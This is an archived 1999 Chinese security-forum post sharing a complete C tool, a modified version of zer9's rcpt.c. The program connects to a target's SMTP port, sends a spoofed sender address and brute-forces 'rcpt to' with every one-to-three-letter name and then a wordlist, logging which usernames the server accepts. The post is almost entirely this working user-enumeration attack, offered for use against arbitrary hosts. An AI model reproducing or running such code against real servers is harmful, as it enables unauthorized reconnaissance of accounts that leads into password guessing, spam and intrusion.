精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◇程序代码◇>>改了一下zer9的rcpt.c,zer9不介意吧?:)

主题:改了一下zer9的rcpt.c,zer9不介意吧?:)
发信人: deepin()
整理人: williamlong(1999-05-14 17:16:41), 站内信件
对zer9的rcpt.c小小修改了一下,zer9不会介意吧? :-)
虽然用暴力法,不过也不要太暴力了,呵呵.
所以我把循环改成了3位,主要靠用户名字典来猜,其实命中率也是
很高的,不然按照zer9的一秒猜一个就算是4位,也要130个小时虽然
可以用多线程加快速度,可惜我还不会写 :( 本来还想把rcpt.log
整理输出成用户名文件,可惜我太懒了 :))RedHat5.2下通过.

       /* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd 
        *  thr0ugh "rcpt" gain rem0te server's user list   
        *                       by                                
        *                      zer9 
        *              Small modify by deepin
        *                 [email protected] 
        *            [email protected] 
        *      test on:slackware 2.0.34&irix6.4&Redhat5.2
        *               cc rcpt.c -o rcpt 
        *         后台运行:nohup ./rcpt <Target>& 
        *thanks zer9 ,he write the main program and i only modify a li
tter :-)
        */     
                        
       #include <stdio.h> 
       #include <stdlib.h> 
       #include <string.h> 
       #include <netinet/in.h> 
       #include <sys/types.h> 
       #include <sys/stat.h> 
       #include <sys/time.h> 
       #include <fcntl.h> 
       #include <netdb.h> 
       #include <unistd.h> 
       #include <sys/socket.h> 
       #include <signal.h> 
       #include <ctype.h> 
       #include <arpa/inet.h> 

       #define  SMTPPORT   25 
       #define  VERSION     "0.081" 
       #define  LogFile    "./rcpt.log"
       #define  TIMEOUT    200 
       #define  SleepTime  1 

       int ver(void); 
       int look_up(int sock,char *string,char *buff); 
       int writeln(int sock,char *string) 
       { 
        char sendbuf[100]; 
         
        bzero(sendbuf,100); 
        strncpy(sendbuf,string,strlen(string)); 
        strncat(sendbuf,"\n",1); 
        send(sock,sendbuf,strlen(sendbuf),0); 
        return 0; 
       }  

       int s; 
       FILE *fp,*wfp;

       int main(int argc,char *argv[]) 
       { 
        struct sockaddr_in sin; 
        struct in_addr Target; 
        struct hostent *he; 
        char j; 
        char recvbuf[1000],rcpt[200],a[8],hello_Target[500],word[10]; 

         
        if(argc!=3) 
         { 
          printf("Rcpt %s   by zer9[FTT]&deepin  mailto: [email protected]
\n",VERSION); 

          printf("Usage: %s <Target> <WordlistFile> \n",argv[0]); 
          return -1;  
         } 
        if((fp=fopen(LogFile,"a+"))==NULL) 
        { 
         perror("fopen"); 
         return -1;  
        } 
        if((wfp=fopen(argv[2],"r"))==NULL)
        {
         perror("fopen");
         return -1;
        }
        if((he=gethostbyname(argv[1]))!=NULL) 
        { 
         bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length); 
        } 
        else 
         Target.s_addr=inet_addr(argv[1]); 
        if(Target.s_addr==-1) 
         { 
          perror("gethostbyname"); 
          return -1;  
         } 
         ver(); 
         fprintf(fp,"@Target: %s   ",argv[1]); 
         if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
perror("sock");
return -1;
}
sin.sin_family=AF_INET;
sin.sin_port=htons(SMTPPORT);
sin.sin_addr.s_addr=Target.s_addr;
if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
bzero(a,sizeof(a));
fprintf(fp,"==================================================
=======
======\n");
if(recv(s,recvbuf,sizeof(recvbuf),0)<0) /* get Title */

{
perror("recv");
return -1;
}
fprintf(fp,"%s\n",recvbuf);
writeln(s,"help");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
if(strstr(recvbuf,"RCPT")==NULL) /* check RCPT */
{
perror("no RCPT command. exit...");
return -1;
}
fprintf(fp,"------------------------------------\n");
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"RSET");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
strcpy(hello_Target,"HELO ");
strcat(hello_Target,"default");
writeln(s,hello_Target);
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"mail from: [email protected]"); /*ma1l fr0m: zer9@fb
i.gov*/

recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
fprintf(fp,"------------------------------------\n");

/* 1bits */
for(a[0]='a';a[0]<='z';a[0]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c",a[0]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}

/* 2 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c",a[0],a[1]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 3 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c",a[0],a[1],a[2]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}

/*Read from WordsList */
fscanf(wfp,"%s",word);
while(!feof(wfp))
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
strncat(rcpt,word,strlen(word));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
fscanf(wfp,"%s",word);
}

fprintf(fp,"==================================================
=======
====\n");
fprintf(fp,"okay!\n\n\n\n\n");
close(s);
fclose(wfp);
fclose(fp);
return 0;
}


int look_up(int sock,char *string,char *buff)
{
if(strstr(buff,"ent ok")!=NULL)

/* at sendmail 8.8.7: Recipient ok*/
fprintf(fp,"%s",buff);
fflush(fp);
return 0;
}

int ver(void)
{
fprintf(fp,"\n###############################\n");
fprintf(fp,"Rcpt %s by zer9[FTT]&deepin mailto: [email protected]
om\n",VERSION)
;
return 0;
}

--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.32.93]

[关闭][返回]